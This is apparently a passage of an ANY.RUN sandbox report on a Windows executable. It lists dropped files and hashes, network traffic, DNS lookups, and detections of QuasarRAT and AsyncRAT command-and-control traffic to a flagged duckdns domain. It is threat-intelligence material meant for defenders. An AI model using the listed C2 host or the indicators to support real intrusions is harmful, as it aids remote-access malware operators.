SHA256:64FC9AB111C22D7F2394408CBB352E37AA2E466A6E3AA64AA29ADCF39B76A241
3220powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_0bdb2ils.b4z.ps1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
1760svchost.exeC:\Windows\Prefetch\9BF5171DD1229EE3E488E3FD3D2A0-1DE6EB01.pfbinary
MD5:F16E7DEAD53F4E2E853620DCBEE8F484
SHA256:24A0D9DB8923F881DF7CB7A9723C75EAA4D395557B9CC4D315810CC6EC179C89
1236svchost.exeC:\WINDOWS\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Scanxml
MD5:DF4D2EF797D720ADB05E5EE9A7C4E192
SHA256:CEDED5FD52F34235181673DC1E3825AF93F953DA02704E1596971027C0CF45C3
1996powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_dw4snynn.ome.psm1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
6876MoUsoCoreWorker.exeC:\ProgramData\USOPrivate\UpdateStore\store.db-journalbinary
MD5:7F60EBF595D569BE65D626D7BDFFEEE8
SHA256:A523752CCF49FBBB0EC9F95FB751E6927CDD81DAC608784C079395F63875BC8C
1996powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_hhafeyt4.zkt.ps1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
3220powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_ug2pggxi.q42.psm1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
1760svchost.exeC:\Windows\Prefetch\SLUI.EXE-724E99D9.pfbinary
MD5:47AF975C78F7D96FE74BC32C8A21AF74
SHA256:CA21D3C07D71DC923C5CB0B4B4C831805677C615EBD400B095BEAD3893DCB834
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
12
TCP/UDP connections
41
DNS requests
15
Threats
5

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
6692
svchost.exe
POST
302
23.218.210.69:80
http://go.microsoft.com/fwlink/?LinkID=252669&clcid=0x409
unknown
unknown
6692
svchost.exe
POST
138.91.171.81:80
http://dmd.metaservices.microsoft.com/metadata.svc
unknown
unknown
6692
svchost.exe
POST
302
23.218.210.69:80
http://go.microsoft.com/fwlink/?LinkID=252669&clcid=0x409
unknown
unknown
6692
svchost.exe
POST
138.91.171.81:80
http://dmd.metaservices.microsoft.com/metadata.svc
unknown
unknown
6692
svchost.exe
POST
302
23.218.210.69:80
http://go.microsoft.com/fwlink/?LinkID=252669&clcid=0x409
unknown
unknown
6692
svchost.exe
POST
138.91.171.81:80
http://dmd.metaservices.microsoft.com/metadata.svc
unknown
unknown
6692
svchost.exe
POST
302
23.218.210.69:80
http://go.microsoft.com/fwlink/?LinkID=252669&clcid=0x409
unknown
unknown
6692
svchost.exe
POST
302
23.218.210.69:80
http://go.microsoft.com/fwlink/?LinkID=252669&clcid=0x409
unknown
unknown
6692
svchost.exe
POST
302
23.218.210.69:80
http://go.microsoft.com/fwlink/?LinkID=252669&clcid=0x409
unknown
unknown
6692
svchost.exe
POST
502
20.231.121.79:80
http://dmd.metaservices.microsoft.com/metadata.svc
unknown
html
183 b
unknown
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
4
System
192.168.100.255:138
whitelisted
40.115.3.253:443
MICROSOFT-CORP-MSN-AS-BLOCK
NL
unknown
3624
svchost.exe
239.255.255.250:1900
unknown
6876
MoUsoCoreWorker.exe
20.73.194.208:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
NL
whitelisted
892
svchost.exe
40.126.32.74:443
MICROSOFT-CORP-MSN-AS-BLOCK
NL
whitelisted
3308
svchost.exe
40.113.110.67:443
client.wns.windows.com
MICROSOFT-CORP-MSN-AS-BLOCK
NL
whitelisted
4
System
192.168.100.255:137
whitelisted
892
svchost.exe
40.126.32.133:443
MICROSOFT-CORP-MSN-AS-BLOCK
NL
unknown
4432
svchost.exe
20.73.194.208:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
NL
whitelisted
6288
backgroundTaskHost.exe
104.126.37.176:443
www.bing.com
Akamai International B.V.
DE
unknown

DNS requests

Domain
IP
Reputation
client.wns.windows.com
  • 40.113.110.67
whitelisted
settings-win.data.microsoft.com
  • 20.73.194.208
whitelisted
www.bing.com
  • 104.126.37.176
  • 104.126.37.155
  • 104.126.37.177
  • 104.126.37.137
  • 104.126.37.178
  • 104.126.37.139
  • 104.126.37.136
  • 104.126.37.170
  • 104.126.37.160
whitelisted
arc.msn.com
  • 20.199.58.43
whitelisted
go.microsoft.com
  • 23.218.210.69
whitelisted
dmd.metaservices.microsoft.com
  • 138.91.171.81
  • 52.142.223.178
  • 20.231.121.79
whitelisted
fe3cr.delivery.mp.microsoft.com
  • 20.242.39.171
whitelisted
slscr.update.microsoft.com
  • 40.68.123.157
whitelisted
kinggru.duckdns.org
  • 94.156.71.237
malicious
ipwho.is
  • 195.201.57.90
malicious

Threats

PID
Process
Class
Message
2216
svchost.exe
Potentially Bad Traffic
ET INFO DYNAMIC_DNS Query to a *.duckdns .org Domain
2216
svchost.exe
Misc activity
ET INFO DYNAMIC_DNS Query to *.duckdns. Domain
3220
$sxr-powershell.exe
Domain Observed Used for C2 Detected
ET MALWARE Generic AsyncRAT Style SSL Cert
2216
svchost.exe
Potentially Bad Traffic
ET INFO External IP Lookup Domain in DNS Lookup (ipwho .is)
3220
$sxr-powershell.exe
Malware Command and Control Activity Detected
REMOTE [ANY.RUN] QuasarRAT Successful Connection (GCM_SHA384)
No debug info
Interactive malware hunting service ANY.RUN
© 2017-2026 ANY.RUN ALL RIGHTS RESERVED
ANY.RUN
Reports
9bf5171dd1229ee3e488e3fd3d2a067a85e227d0ed54e1ed18bbc35a89f698b7.exe